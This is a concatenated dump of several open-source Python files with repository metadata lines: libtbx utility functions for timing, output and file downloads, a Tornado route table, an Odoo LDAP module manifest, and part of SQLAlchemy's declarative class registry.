if (time.daylight and localtime[8] != 0):
tzname = time.tzname[1]
offs = -time.altzone
else:
tzname = time.tzname[0]
offs = -time.timezone
return time.strftime("Date %Y-%m-%d Time %H:%M:%S", localtime) \
+ " %s %+03d%02d (%.2f s)" % (
tzname, offs//3600, offs//60%60, seconds_since_epoch)
class timer_base(object):
def __init__(self):
self.t = self.get()
def elapsed(self):
t = self.get()
d = t - self.t
return d
def delta(self):
t = self.get()
d = t - self.t
self.t = t
return d
def show_elapsed(self, prefix="", out=None):
if (out == None): out = sys.stdout
print >> out, prefix+"%.2f s" % self.elapsed()
def show_delta(self, prefix="", out=None):
if (out == None): out = sys.stdout
print >> out, prefix+"%.2f s" % self.delta()
class user_plus_sys_time(timer_base):
def get(self):
t = os.times()
return t[0] + t[1]
class wall_clock_time(timer_base):
""" motivation: when running multithreaded code, user_plus_sys_time
would report the cumulated times for all threads: not very useful
to analyse the scaling with the number of threads! Wall clock time, although
it is less reliable is the only solution in that case """
def get(self):
return time.time()
class time_log(object):
def __init__(self, label, use_wall_clock=False):
self.label = label
self.use_wall_clock = use_wall_clock
self.accumulation = 0
self.n = 0
self.delta = 0
self.timer = None
def start(self):
if (self.use_wall_clock):
self.timer = wall_clock_time()
else:
self.timer = user_plus_sys_time()
return self
def stop(self):
self.delta = self.timer.delta()
self.timer = None
self.accumulation += self.delta
self.n += 1
def average(self):
return self.accumulation / max(1,self.n)
def log(self):
self.stop()
return self.report()
def log_elapsed(self, local_label):
return "time_log: %s: %.2f elapsed %s" % (
self.label, self.timer.elapsed(), local_label)
legend = "time_log: label: n accumulation delta average"
def report(self):
assert self.timer is None
return "time_log: %s: %d %.2f %.3g %.3g" % (
self.label, self.n, self.accumulation,
self.delta, self.average())
def human_readable_time(time_in_seconds):
time_units = time_in_seconds
time_unit = "seconds"
if (time_units > 120):
time_units /= 60
time_unit = "minutes"
if (time_units > 120):
time_units /= 60
time_unit = "hours"
if (time_units > 48):
time_units /= 24
time_unit = "days"
return time_units, time_unit
def human_readable_time_as_seconds(time_units, time_unit):
if (isinstance(time_units, str)): time_units = float(time_units)
if (time_unit == "seconds"): return time_units
if (time_unit == "minutes"): return time_units*60
if (time_unit == "hours"): return time_units*60*60
if (time_unit == "days"): return time_units*60*60*24
raise RuntimeError("Unknown time_unit: %s" % time_unit)
def format_timestamp_12_hour (unix_time, short=False, replace_with="unknown") :
if unix_time is None :
return replace_with
elif short :
return time.strftime("%d-%m-%y %I:%M %p", time.localtime(float(unix_time)))
else :
return time.strftime("%b %d %Y %I:%M %p", time.localtime(float(unix_time)))
def format_timestamp_24_hour (unix_time, short=False, replace_with="unknown") :
if unix_time is None :
return "unknown"
elif short :
return time.strftime("%d-%m-%y %H:%M", time.localtime(float(unix_time)))
else :
return time.strftime("%b %d %Y %H:%M", time.localtime(float(unix_time)))
format_timestamp = format_timestamp_12_hour
def format_cpu_times(show_micro_seconds_per_tick=True):
t = os.times()
result = "u+s,u,s: %.2f %.2f %.2f" % (t[0] + t[1], t[0], t[1])
if (show_micro_seconds_per_tick):
try: python_ticker = sys.gettickeraccumulation()
except AttributeError: pass
else:
result += " micro-seconds/tick: %.3f" % ((t[0]+t[1])/python_ticker*1.e6)
return result
def show_total_time(
out=None,
show_micro_seconds_per_bytecode_instruction=True):
if (out == None): out = sys.stdout
total_time = user_plus_sys_time().get()
try: python_ticker = sys.gettickeraccumulation()
except AttributeError: pass
else:
print >> out, "Time per interpreted Python bytecode instruction:",
print >> out, "%.3f micro seconds" % (total_time / python_ticker * 1.e6)
print >> out, "Total CPU time: %.2f %s" % human_readable_time(total_time)
def show_wall_clock_time(seconds, out=None):
if (out is None): out = sys.stdout
print >> out, "wall clock time:",
if (seconds < 120):
print >> out, "%.2f seconds" % seconds
else:
m = int(seconds / 60 + 1.e-6)
s = seconds - m * 60
print >> out, "%d minutes %.2f seconds (%.2f seconds total)" % (
m, s, seconds)
out_flush = getattr(out, "flush", None)
if (out_flush is not None):
out_flush()
class show_times:
def __init__(self, time_start=None, out=None):
if (time_start is None):
t = os.times()
self.time_start = time.time() - (t[0] + t[1])
elif (time_start == "now"):
self.time_start = time.time()
else:
self.time_start = -(0-time_start) # be sure time_start is a number
self.out = out
def __call__(self):
out = self.out
if (out is None): out = sys.stdout
t = os.times()
usr_plus_sys = t[0] + t[1]
try: ticks = sys.gettickeraccumulation()
except AttributeError: ticks = None
s = "usr+sys time: %.2f seconds" % usr_plus_sys
if (ticks is not None):
s += ", ticks: %d" % ticks
if (ticks != 0):
s += ", micro-seconds/tick: %.3f" % (usr_plus_sys*1.e6/ticks)
print >> out, s
show_wall_clock_time(seconds=time.time()-self.time_start, out=out)
def show_times_at_exit(time_start=None, out=None):
atexit.register(show_times(time_start=time_start, out=out))
class host_and_user:
def __init__(self):
self.host = os.environ.get("HOST")
self.hostname = os.environ.get("HOSTNAME")
self.computername = os.environ.get("COMPUTERNAME")
self.hosttype = os.environ.get("HOSTTYPE")
self.processor_architecture = os.environ.get("PROCESSOR_ARCHITECTURE")
self.machtype = os.environ.get("MACHTYPE")
self.ostype = os.environ.get("OSTYPE")
self.vendor = os.environ.get("VENDOR")
self.user = os.environ.get("USER")
self.username = os.environ.get("USERNAME")
self.homedir = None
if (os.name == "nt") :
homedrive = os.environ.get("HOMEDRIVE")
homepath = os.environ.get("HOMEPATH")
if (not None in [homedrive, homepath]) :
self.homedir = os.path.join(homedrive, homepath)
else :
self.homedir = os.environ.get("HOME")
getpid = getattr(os, "getpid", None)
if (getpid is None):
self.pid = None
else:
self.pid = getpid()
self.sge_info = sge_utils.info()
self.pbs_info = pbs_utils.chunk_info()
def get_user_name (self) :
if (self.user is not None) :
return self.user
else :
return self.username
def get_host_name (self) :
if (self.host is not None) :
return self.host
elif (self.hostname is not None) :
return self.hostname
elif (self.computername is not None) :
return self.computername
return None
def show(self, out=None, prefix=""):
if (out is None): out = sys.stdout
if (self.host is not None):
print >> out, prefix + "HOST =", self.host
if ( self.hostname is not None
and self.hostname != self.host):
print >> out, prefix + "HOSTNAME =", self.hostname
if ( self.computername is not None
and self.computername != self.host):
print >> out, prefix + "COMPUTERNAME =", self.computername
if (self.hosttype is not None):
print >> out, prefix + "HOSTTYPE =", self.hosttype
if (self.processor_architecture is not None):
print >> out, prefix + "PROCESSOR_ARCHITECTURE =", \
self.processor_architecture
if ( self.hosttype is None
or self.machtype is None
or self.ostype is None
or "-".join([self.machtype, self.ostype]) != self.hosttype):
if (self.machtype is not None):
print >> out, prefix + "MACHTYPE =", \
self.machtype
if (self.ostype is not None):
print >> out, prefix + "OSTYPE =", \
self.ostype
if (self.vendor is not None and self.vendor != "unknown"):
print >> out, prefix + "VENDOR =", \
self.vendor
if (self.user is not None):
print >> out, prefix + "USER =", self.user
if ( self.username is not None
and self.username != self.user):
print >> out, prefix + "USERNAME =", self.username
if (self.pid is not None):
print >> out, prefix + "PID =", self.pid
self.sge_info.show(out=out, prefix=prefix)
self.pbs_info.show(out=out, prefix=prefix)
def allow_delete_directory (target_dir) :
"""
Check for specified reserved directories which are standard on many systems;
these should never be deleted as part of any program.
"""
homedir = host_and_user().homedir
safe_dirs = [
homedir,
os.path.join(homedir, "Documents"),
os.path.join(homedir, "Desktop"),
os.path.join(homedir, "Downloads"),
os.path.join(homedir, "Library"),
os.path.join(homedir, "Movies"),
os.path.join(homedir, "data"),
"/",
"/home",
"/Users",
]
target_dir = os.path.abspath(target_dir)
for safe_dir in safe_dirs :
if (target_dir == safe_dir) :
return False
return True
def _indentor_write_loop(write_method, indent, incomplete_line, lines):
for line in lines:
if (len(line) == 0):
incomplete_line = False
elif (incomplete_line):
write_method(line)
incomplete_line = False
else:
write_method(indent)
write_method(line)
write_method("\n")
class indentor(object):
def __init__(self, file_object=None, indent="", parent=None):
if (file_object is None):
if (parent is None):
file_object = sys.stdout
else:
file_object = parent.file_object
self.file_object = file_object
if (hasattr(self.file_object, "flush")):
self.flush = self._flush
self.indent = indent
self.parent = parent
self.incomplete_line = False
def write(self, block):
if (len(block) == 0): return
if (block.endswith("\n")):
_indentor_write_loop(
write_method=self.file_object.write,
indent=self.indent,
incomplete_line=self.incomplete_line,
lines=block.splitlines())
self.incomplete_line = False
else:
lines = block.splitlines()
if (len(lines) == 1):
if (self.incomplete_line):
self.file_object.write(lines[-1])
else:
self.file_object.write(self.indent + lines[-1])
else:
_indentor_write_loop(
write_method=self.file_object.write,
indent=self.indent,
incomplete_line=self.incomplete_line,
lines=lines[:-1])
self.file_object.write(self.indent + lines[-1])
self.incomplete_line = True
def _flush(self):
self.file_object.flush()
def shift_right(self, indent=" "):
return self.__class__(indent=self.indent+indent, parent=self)
class buffered_indentor(indentor):
def __init__(self, file_object=None, indent="", parent=None):
indentor.__init__(self, file_object, indent, parent)
self.buffer = []
def write(self, block):
self.buffer.append(block)
def write_buffer(self):
if (self.parent is not None):
self.parent.write_buffer()
for block in self.buffer:
indentor.write(self, block)
self.buffer = []
class null_out(object):
"""Pseudo-filehandle for suppressing printed output."""
def isatty(self): return False
def close(self): pass
def flush(self): pass
def write(self, str): pass
def writelines(self, sequence): pass
class raise_if_output(object):
"example use: sys.stdout = raise_if_output()"
def isatty(self): return False
def close(self): pass
def flush(self): pass
def write(self, str): raise RuntimeError
def writelines(self, sequence): raise RuntimeError
class multi_out(object):
"""
Multiplexing output stream, e.g. for simultaneously printing to stdout
and a logfile.
"""
def __init__(self):
self.labels = []
self.file_objects = []
self.atexit_send_to = []
self.closed = False
self.softspace = 0
atexit.register(self._atexit)
def _atexit(self):
if (not self.closed):
for f,a in zip(self.file_objects, self.atexit_send_to):
if (a is not None): a.write(f.getvalue())
def register(self, label, file_object, atexit_send_to=None):
"""Adds an output stream to the list."""
assert not self.closed
self.labels.append(label)
self.file_objects.append(file_object)
self.atexit_send_to.append(atexit_send_to)
return self
def replace_stringio(self,
old_label,
new_label,
new_file_object,
new_atexit_send_to=None):
i = self.labels.index(old_label)
old_file_object = self.file_objects[i]
new_file_object.write(old_file_object.getvalue())
old_file_object.close()
self.labels[i] = new_label
self.file_objects[i] = new_file_object
self.atexit_send_to[i] = new_atexit_send_to
def isatty(self):
return False
def close(self):
for file_object in self.file_objects:
if (file_object is sys.__stdout__): continue
if (file_object is sys.__stderr__): continue
file_object.close()
self.closed = True
def flush(self):
for file_object in self.file_objects:
flush = getattr(file_object, "flush", None)
if (flush is not None): flush()
def write(self, str):
for file_object in self.file_objects:
file_object.write(str)
def writelines(self, sequence):
for file_object in self.file_objects:
file_object.writelines(sequence)
def write_this_is_auto_generated(f, file_name_generator):
print >> f, """\
/* *****************************************************
THIS IS AN AUTOMATICALLY GENERATED FILE. DO NOT EDIT.
*****************************************************
Generated by:
%s
*/
""" % file_name_generator
class import_python_object:
def __init__(self, import_path, error_prefix, target_must_be, where_str):
path_elements = import_path.split(".")
if (len(path_elements) < 2):
raise ValueError(
'%simport path "%s" is too short%s%s' % (
error_prefix, import_path, target_must_be, where_str))
module_path = ".".join(path_elements[:-1])
try: module = __import__(module_path)
except ImportError:
raise ImportError("%sno module %s%s" % (
error_prefix, module_path, where_str))
for attr in path_elements[1:-1]:
module = getattr(module, attr)
try: self.object = getattr(module, path_elements[-1])
except AttributeError:
raise AttributeError(
'%sobject "%s" not found in module "%s"%s' % (
error_prefix, path_elements[-1], module_path, where_str))
self.path_elements = path_elements
self.module_path = module_path
self.module = module
class input_with_prompt(object):
def __init__(self, prompt, tracebacklimit=0):
try: import readline
except Exception: pass
try: self.previous_tracebacklimit = sys.tracebacklimit
except Exception: self.previous_tracebacklimit = None
if (tracebacklimit is not None):
sys.tracebacklimit = tracebacklimit
self.input = raw_input(prompt)
def __del__(self):
if (self.previous_tracebacklimit is None):
del sys.tracebacklimit
else:
sys.tracebacklimit = self.previous_tracebacklimit
def count_max(assert_less_than):
i = 0
while True:
yield None
i += 1
assert i < assert_less_than
class detect_binary_file(object):
def __init__(self, monitor_initial=None, max_fraction_non_ascii=None):
if (monitor_initial is None):
self.monitor_initial = 1000
else:
self.monitor_initial = monitor_initial
if (max_fraction_non_ascii is None):
self.max_fraction_non_ascii = 0.05
else:
self.max_fraction_non_ascii = max_fraction_non_ascii
self.n_ascii_characters = 0
self.n_non_ascii_characters = 0
self.status = None
def is_binary_file(self, block):
if (self.monitor_initial > 0):
for c in block:
if (1 < ord(c) < 128):
self.n_ascii_characters += 1
else:
self.n_non_ascii_characters += 1
self.monitor_initial -= 1
if (self.monitor_initial == 0):
if ( self.n_non_ascii_characters
> self.n_ascii_characters * self.max_fraction_non_ascii):
self.status = True
else:
self.status = False
break
return self.status
def from_initial_block(
file_name,
monitor_initial=None,
max_fraction_non_ascii=None):
detector = detect_binary_file(
monitor_initial=monitor_initial,
max_fraction_non_ascii=max_fraction_non_ascii)
block = open(file_name, "rb").read(detector.monitor_initial)
if (len(block) == 0): return False
detector.monitor_initial = min(len(block), detector.monitor_initial)
return detector.is_binary_file(block=block)
from_initial_block = staticmethod(from_initial_block)
def search_for(
pattern,
mode,
re_flags=0,
lines=None,
file_name=None):
assert mode in ["==", "find", "startswith", "endswith", "re.search", "re.match"]
assert [lines, file_name].count(None) == 1
if (lines is None):
lines = open(file_name).read().splitlines()
result = []
a = result.append
if (mode == "=="):
for l in lines:
if (l == pattern): a(l)
elif (mode == "startswith"):
for l in lines:
if (l.startswith(pattern)): a(l)
elif (mode == "endswith"):
for l in lines:
if (l.endswith(pattern)): a(l)
elif (mode == "find"):
for l in lines:
if (l.find(pattern) >= 0): a(l)
elif (mode == "re.search"):
import re
for l in lines:
if (re.search(pattern=pattern, string=l, flags=re_flags) is not None):
a(l)
else:
import re
for l in lines:
if (re.match(pattern=pattern, string=l, flags=re_flags) is not None):
a(l)
return result
class progress_displayed_as_fraction(object):
def __init__(self, n):
self.n = n
self.i = 0
if self.n == 1: self.advance = lambda: None
self.advance()
def advance(self):
if self.i > 0: sys.stdout.write('\r')
sys.stdout.write("%i / %i" % (self.i, self.n))
sys.stdout.flush()
self.i += 1
def done(self):
if self.n == 1: return
sys.stdout.write("\n")
sys.stdout.flush()
class progress_bar(progress_displayed_as_fraction):
def advance(self):
characters = ['|']
if self.i > 0:
characters.extend(['=']*(self.i-1))
characters.append('>')
characters.extend(' '*(self.n - self.i))
characters.append('|\r')
sys.stdout.write(''.join(characters))
sys.stdout.flush()
self.i += 1
def format_float_with_standard_uncertainty(value, standard_uncertainty):
if standard_uncertainty < 1e-16: return str(value)
precision = -int(round(math.log10(standard_uncertainty)))
if precision > -1:
su = standard_uncertainty * math.pow(10, precision)
if round(su,1) < 2:
su *= 10
precision += 1
fmt_str = "%%.%if(%%i)" %precision
return fmt_str %(value, round(su))
else:
precision += 1
su = int(round(standard_uncertainty, precision))
fmt_str = "%.0f(%i)"
return fmt_str %(round(value, precision), su)
def random_hex_code(number_of_digits):
import random
digits = []
for i_digit in xrange(number_of_digits):
i = random.randrange(16)
digits.append("0123456789abcdef"[i])
return "".join(digits)
def get_svn_revision(path=None):
# adapted from:
# http://code.djangoproject.com/browser/django/trunk/django/utils/version.py
rev = None
if path is None:
import libtbx.load_env
path = op.dirname(libtbx.env.dist_path(module_name="libtbx"))
entries_path = '%s/.svn/entries' % path
try:
entries = open(entries_path, 'r').read()
except IOError:
pass
else:
# Versions >= 7 of the entries file are flat text. The first line is
# the version number. The next set of digits after 'dir' is the revision.
if re.match('(\d+)', entries):
rev_match = re.search('\d+\s+dir\s+(\d+)', entries)
if rev_match:
rev = int(rev_match.groups()[0])
return rev
def get_build_tag(path=None):
tag = None
if path is None:
import libtbx.load_env
path = op.dirname(libtbx.env.dist_path(module_name="libtbx"))
tag_file_path = "%s/TAG" %path
if op.exists(tag_file_path):
tag = open(tag_file_path).readline().strip()
return tag
def getcwd_safe () :
try :
cwd = os.getcwd()
except OSError, e :
if (e.errno == 2) :
raise Sorry("Could not determine the current working directory because "+
"it has been deleted or unmounted.")
else :
raise e
return cwd
def getcwd_or_default (default=None) :
if (default is None) :
if (os.name == "nt") :
home_drive = os.environ.get("HOMEDRIVE", "C:")
home_dir = os.environ.get("HOMEPATH", "\\")
default = home_drive + home_dir
else :
default = os.environ.get("HOME", "/")
try :
cwd = os.getcwd()
except OSError, e :
if (e.errno == 2) :
cwd = default
else :
raise e
return cwd
def create_run_directory (prefix, default_directory_number=None) :
"""
Create a program output directory using sequential numbering, picking the
highest run ID. In other words, if the prefix is 'Refine' and the current
directory contains subdirectories named Refine_2 and Refine_9, the new
directory will be Refine_10.
"""
dir_number = default_directory_number
if (dir_number is None) :
dir_ids = []
for file_name in os.listdir(os.getcwd()) :
if (os.path.isdir(file_name)) and (file_name.startswith(prefix)) :
dir_id = file_name.split("_")[-1]
if (dir_id.isdigit()) :
dir_ids.append(int(dir_id))
if (len(dir_ids) > 0) :
dir_number = max(max(dir_ids) + 1, 1)
else :
dir_number = 1
dir_name = prefix + "_" + str(dir_number)
if (os.path.isdir(dir_name)) :
raise OSError("The directory %s already exists."%os.path.abspath(dir_name))
else :
os.makedirs(dir_name)
return os.path.abspath(dir_name)
class tmp_dir_wrapper (object) :
"""
Convenience methods for running in a (presumably empty) temporary directory
and copying all files to another directory. Can be used whether or not the
temporary directory is actually defined; if None, no action will be taken.
Otherwise, both tmp_dir and dest_dir (default is current directory) must be
existing paths.
"""
def __init__ (self, tmp_dir, dest_dir=None, out=sys.stdout) :
if (dest_dir is None) :
dest_dir = os.getcwd()
self.tmp_dir = tmp_dir
self.dest_dir = dest_dir
if (tmp_dir is None) :
pass
elif (not os.path.isdir(tmp_dir)) :
raise Sorry("The temporary directory %s does not exist." % tmp_dir)
else :
if (not os.path.isdir(dest_dir)) :
raise Sorry("The destination directory %s does not exist." % dest_dir)
print >> out, "Changing working directory to %s" % tmp_dir
print >> out, "Ultimate destination is %s" % dest_dir
os.chdir(tmp_dir)
def transfer_files (self, out=sys.stdout) :
if (self.tmp_dir is None) : return False
assert os.path.isdir(self.dest_dir)
files = os.listdir(self.tmp_dir)
print >> out, "Copying all output files to %s" % self.dest_dir
for file_name in files :
print >> out, " ... %s" % file_name
shutil.copy(os.path.join(self.tmp_dir, file_name), self.dest_dir)
print >> out, ""
return True
def show_development_warning (out=sys.stdout) :
print >> out, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! WARNING - EXPERIMENTAL PROGRAM !!
!! !!
!! This program is still in development - some functionality may be !!
!! missing and/or untested. Use at your own risk! For bug reports, etc. !!
!! email [email protected]. !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def check_if_output_directory_exists (file_name=None, dir_name=None) :
if (file_name is not None) :
assert (dir_name is None)
dir_name = os.path.dirname(file_name)
if (dir_name == "") : return
if (dir_name is None) :
raise Sorry("No output directory specified.")
if (not op.isdir(dir_name)) :
raise Sorry(("The specified output directory (%s) does not exist or "+
"is not a directory.") % dir_name)
else :
# XXX writing to Dropbox folders is generally not a good idea
head, tail = os.path.split(dir_name)
while tail != "" :
if (tail == "Dropbox") :
warnings.warn("You are directing output to a Dropbox directory. "+
"Please note that this is not guaranteed to work in all cases; "+
"use at your own risk.", UserWarning)
head, tail = os.path.split(head)
def concatenate_python_script (out, file_name) :
"""
Insert a Python script into an existing file, removing any __future__
import to prevent syntax errors. (This could be dangerous in most contexts
but is required for some of our Coot-related scripts to work.)
"""
data = open(file_name, "r").read()
print >> out, ""
print >> out, "#--- script copied from %s" % os.path.basename(file_name)
for line in data.splitlines() :
if line.startswith("from __future__") :
continue
else :
print >> out, line
print >> out, "#--- end"
print >> out, ""
def greek_time(secs):
for greek in ["","milli", "micro", "nano"]:
if secs>1:
break
secs*=1000
return secs, greek
###########################
# URL retrieval functions #
###########################
libtbx_urllib_proxy = None
def install_urllib_http_proxy (server, port=80, user=None, password=None) :
global libtbx_urllib_proxy
import urllib2
if (user is None) :
proxy = urllib2.ProxyHandler({'http': '%s:%d' % (server, port) })
opener = urllib2.build_opener(proxy)
else :
proxy = urllib2.ProxyHandler({
'http': 'http://%s:%s@%s:%s' % (user, password, server, port),
})
auth = urllib2.HTTPBasicAuthHandler()
opener = urllib2.build_opener(proxy, auth, urllib2.HTTPHandler)
libtbx_urllib_proxy = proxy
urllib2.install_opener(opener)
print "Installed urllib2 proxy at %s:%d" % (server, port)
return proxy
def urlopen (*args, **kwds) :
"""
Substitute for urllib2.urlopen, with automatic HTTP proxy configuration
if specific environment variables are defined.
"""
if ("CCTBX_HTTP_PROXY" in os.environ) and (libtbx_urllib_proxy is None) :
server = os.environ["CCTBX_HTTP_PROXY_SERVER"]
port = os.environ.get("CCTBX_HTTP_PROXY_PORT", 80)
user = os.environ.get("CCTBX_HTTP_PROXY_USER", None)
passwd = os.environ.get("CCTBX_HTTP_PROXY_PASSWORD", None)
if (user is not None) and (password is None) :
raise Sorry("You have defined a user name for the HTTP proxy, but "+
"no password was specified. Please set the environment variable "+
"CCTBX_HTTP_PROXY_PASSWORD.")
install_urllib_http_proxy(
server=server,
port=port,
user=user,
password=password)
import urllib2
return urllib2.urlopen(*args, **kwds)
class download_progress (object) :
"""
Simple proxy for displaying download status - here with methods for
writing to the console, but can be subclassed and used for graphical display.
"""
def __init__ (self, log=None, n_kb_total=None) :
if (log is None) :
log = null_out()
self.log = log
self.n_kb_total = n_kb_total
self.n_kb_elapsed = 0
def set_total_size (self, n_kb_total) :
self.n_kb_total = n_kb_total
self.n_kb_elapsed = 0
def increment (self, n_kb) :
assert (self.n_kb_total is not None)
self.n_kb_elapsed += n_kb
return self.show_progress()
def show_progress (self) :
self.log.write("\r%d/%d KB downloaded" % (self.n_kb_elapsed,
self.n_kb_total))
self.log.flush()
return True
def percent_finished (self) :
assert (self.n_kb_total is not None)
return 100 * min(1.0, self.n_kb_elapsed / self.n_kb_total)
def complete (self) :
self.log.write("\rDownload complete")
def run_continuously (self) :
"""
Placeholder for cases where the download is not being run asynchronously.
"""
pass
class download_target (object) :
"""
Flexible callable object for retrieving a file from a URL, with optional
HTTPS authentication. Designed to be runnable in a separate thread with
graphical progress update.
Note that in some circumstances SSL support may be missing from the socket
module, in which case we use 'curl' to download securely. (This will not
work on Windows, obviously.)
"""
def __init__ (self,
url,
file_name,
use_curl=None, # SSL only
user=None, # SSL only
password=None, # SSL only
base_url=None) : # SSL only
self.url = url
self.file_name = file_name
self.use_curl = use_curl
self.user = user
self.password = password
self.base_url = base_url
if (not None in [self.user, self.password]) :
assert (self.base_url is not None)
import socket
if ((not self.use_curl) and (hasattr(socket, "ssl")) and
(hasattr(socket.ssl, "__call__"))) :
self.use_curl = False
else :
self.use_curl = True
def __call__ (self, log=None, progress_meter=None) :
if (log is None) :
log = null_out()
if (progress_meter is None) :
progress_meter = download_progress(log=log)
from libtbx import easy_run
import urllib2
file_name = self.file_name # return value
if (not self.use_curl) :
if (not None in [self.user, self.password]) :
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, self.base_url, params.user, params.password)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
req = urllib2.urlopen(self.url)
info = req.info()
n_kb_total = int(info['Content-length']) / 1024
progress_meter.set_total_size(n_kb_total)
# TODO adjust chunk size automatically based on download speed
n_kb_chunk = getattr(self, "n_kb_chunk", 512)
chunksize = n_kb_chunk * 1024
fp = open(self.file_name, 'wb')
while True:
chunk = req.read(chunksize)
if not chunk: break
if not progress_meter.increment(n_kb_chunk) :
file_name = None
break
fp.write(chunk)
fp.close()
progress_meter.complete()
else :
progress_meter.run_continuously()
if (not None in [self.user, self.password]) :
curl_args = "--user %s:%s" % (self.user, self.password)
rc = easy_run.call("curl %s \"%s\" -o %s" % (curl_args, self.url,
self.file_name))
progress_meter.complete()
if (rc != 0) :
raise RuntimeError("curl exited with code %d" % rc)
if (file_name is None) :
return None
return op.abspath(self.file_name)
| mit |
ptphp/PyLib | src/tornado/demos/Vulpix-master/handlers.py | 2 | 1560 | # -*- coding: utf-8 -*-
# AUTHOR: Zeray Rice <[email protected]>
# FILE: handlers.py
# CREATED: 01:41:06 08/03/2012
# MODIFIED: 20:28:26 18/04/2012
# DESCRIPTION: URL Route
from api import *
from home import *
from lang import *
from forum import *
from member import *
from problem import *
from contest import *
from backstage import *
'''
'' Handler 命名规范: [动宾结构 / 名词] + Handler
'''
handlers = [
(r'/', HomeHandler),
(r'/signin', SigninHandler),
(r'/signup', SignupHandler),
(r'/signout', SignoutHandler),
(r'/settings', SettingsHandler),
(r'/settings/changepass', ChangePasswordHandler),
(r'/member', ListMemberHandler),
(r'/member/(.*)', MemberHandler),
(r'/lang/(.*)', SetLanguageHandler),
(r'/problem', ListProblemHandler),
(r'/problem/([\d]*)', ViewProblemHandler),
(r'/tag/(.*)', ViewTagHandler),
(r'/submit', ListSubmitHandler),
(r'/submit/(.*)', ViewSubmitHandler),
(r'/backstage/problem/add', AddProblemHandler),
(r'/backstage/contest/add', AddContestHandler),
(r'/backstage/node/add', AddNodeHandler),
(r'/backstage/judger', ManageJudgerHandler),
(r'/backstage/judger/add', AddJudgerHandler),
(r'/contest', ListContestHandlder),
(r'/contest/([\d]*)', ViewContestHandler),
(r'/go/(.*)', ViewNodeHandler),
(r'/t/([\d]*)', ViewTopicHandler),
(r'/new/(.*)', CreateTopicHandler),
(r'/forum', ViewForumHandler),
(r'/test', TestHandler),
(r'/api/problem/get/([\d]*)', GetProblemHandler),
]
| apache-2.0 |
nhomar/odoo-mirror | addons/auth_ldap/__openerp__.py | 50 | 1567 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Authentication via LDAP',
'version' : '1.0',
'depends' : ['base'],
'images' : ['images/ldap_configuration.jpeg'],
'author' : 'OpenERP SA',
#'description': < auto-loaded from README file
'website' : 'https://www.odoo.com',
'category' : 'Authentication',
'data' : [
'users_ldap_view.xml',
'user_ldap_installer.xml',
'security/ir.model.access.csv',
],
'auto_install': False,
'installable': True,
'external_dependencies' : {
'python' : ['ldap'],
}
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mitsuhiko/sqlalchemy | lib/sqlalchemy/ext/declarative/clsregistry.py | 6 | 9816 | # ext/declarative/clsregistry.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Routines to handle the string class registry used by declarative.
This system allows specification of classes and expressions used in
:func:`.relationship` using strings.
"""
from ...orm.properties import ColumnProperty, RelationshipProperty, \
SynonymProperty
from ...schema import _get_table_key
from ...orm import class_mapper, interfaces
from ... import util
from ... import exc
import weakref
# strong references to registries which we place in
# the _decl_class_registry, which is usually weak referencing.
# the internal registries here link to classes with weakrefs and remove
# themselves when all references to contained classes are removed.
_registries = set()
def add_class(classname, cls):
"""Add a class to the _decl_class_registry associated with the
given declarative class.
"""
if classname in cls._decl_class_registry:
# class already exists.
existing = cls._decl_class_registry[classname]
if not isinstance(existing, _MultipleClassMarker):
existing = \
cls._decl_class_registry[classname] = \
_MultipleClassMarker([cls, existing])
else:
cls._decl_class_registry[classname] = cls
try:
root_module = cls._decl_class_registry['_sa_module_registry']
except KeyError:
cls._decl_class_registry['_sa_module_registry'] = \
root_module = _ModuleMarker('_sa_module_registry', None)
tokens = cls.__module__.split(".")
# build up a tree like this:
# modulename: myapp.snacks.nuts
#
# myapp->snack->nuts->(classes)
# snack->nuts->(classes)
# nuts->(classes)
#
# this allows partial token paths to be used.
while tokens:
token = tokens.pop(0)
module = root_module.get_module(token)
for token in tokens:
module = module.get_module(token)
module.add_class(classname, cls)
class _MultipleClassMarker(object):
"""refers to multiple classes of the same name
within _decl_class_registry.
"""
def __init__(self, classes, on_remove=None):
self.on_remove = on_remove
self.contents = set([
weakref.ref(item, self._remove_item) for item in classes])
_registries.add(self)
def __iter__(self):
return (ref() for ref in self.contents)
def attempt_get(self, path, key):
if len(self.contents) > 1:
raise exc.InvalidRequestError(
"Multiple classes found for path \"%s\" "
"in the registry of this declarative "
"base. Please use a fully module-qualified path." %
(".".join(path + [key]))
)
else:
ref = list(self.contents)[0]
cls = ref()
if cls is None:
raise NameError(key)
return cls
def _remove_item(self, ref):
self.contents.remove(ref)
if not self.contents:
_registries.discard(self)
if self.on_remove:
self.on_remove()
def add_item(self, item):
modules = set([cls().__module__ for cls in self.contents])
if item.__module__ in modules:
util.warn(
"This declarative base already contains a class with the "
"same class name and module name as %s.%s, and will "
"be replaced in the string-lookup table." % (
item.__module__,
item.__name__
)
)
self.contents.add(weakref.ref(item, self._remove_item))
class _ModuleMarker(object):
""""refers to a module name within
_decl_class_registry.
"""
def __init__(self, name, parent):
self.parent = parent
self.name = name
self.contents = {}
self.mod_ns = _ModNS(self)
if self.parent:
self.path = self.parent.path + [self.name]
else:
self.path = []
_registries.add(self)
def __contains__(self, name):
return name in self.contents
def __getitem__(self, name):
return self.contents[name]
def _remove_item(self, name):
self.contents.pop(name, None)
if not self.contents and self.parent is not None:
